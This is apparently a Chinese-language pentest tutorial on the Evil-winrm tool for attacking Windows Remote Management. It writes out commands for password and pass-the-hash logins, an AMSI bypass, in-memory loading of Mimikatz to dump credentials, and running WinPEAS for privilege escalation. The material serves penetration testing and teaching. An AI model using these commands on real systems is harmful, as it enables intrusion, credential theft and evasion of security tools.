在网络安全领域,技术的进步总是伴随着攻防两端的较量。今天,我们将深入探讨一个由Hackplayers团队开发的高效渗透工具——Evil-winrm,它专为简化Microsoft Windows环境下的渗透测试而设计。Evil-winrm与PowerShell远程协议(PSRP)协同工作,利用Windows远程管理协议(WinRM)实现远程操作。
nmap -p 5985,5986 192.168.1.19
一旦确认目标主机的WinRM服务已开启,我们便可以使用Evil-winrm进行远程管理。
Evil-winrm支持多种登录方式,包括使用纯文本密码登录、启动SSL加密的登录会话、利用NTLM哈希进行传递哈希攻击等。
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S
evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38
Evil-winrm还允许用户直接从本地机器加载PowerShell脚本到目标机器的内存中,同时提供绕过AMSI的功能。
脚本获取来源:
https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
使用以下命令可以加载并执行Mimikatz脚本:
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1
Evil-winrm还提供了日志存储功能,方便在CTF比赛或渗透测试中保存操作记录。同时,它还能在PowerShell会话中运行exe可执行文件,为攻击者提供了极大的便利。
允许通过 -l
标志将所有日志保存到本地机器
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l
提供了一个存储在本地机器中的 WinPEAS.exe
可执行文件的路径
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc
Bypass-4MSI
menu
Invoke-Binary /opt/privsc/winPEASx64.exe
Evil-winrm能够列出目标系统中运行的所有服务,帮助攻击者识别未被其他工具检测到的服务。此外,它还支持文件的上传和下载,简化了在目标系统和攻击者机器之间的文件传输过程。
Evil-winrm是一个功能强大的渗透测试工具,它通过多种登录方式、脚本执行、日志存储等功能,极大地简化了渗透测试的过程。随着网络安全威胁的不断演变,工具如Evil-winrm在安全专家和渗透测试人员的工具箱中扮演着越来越重要的角色。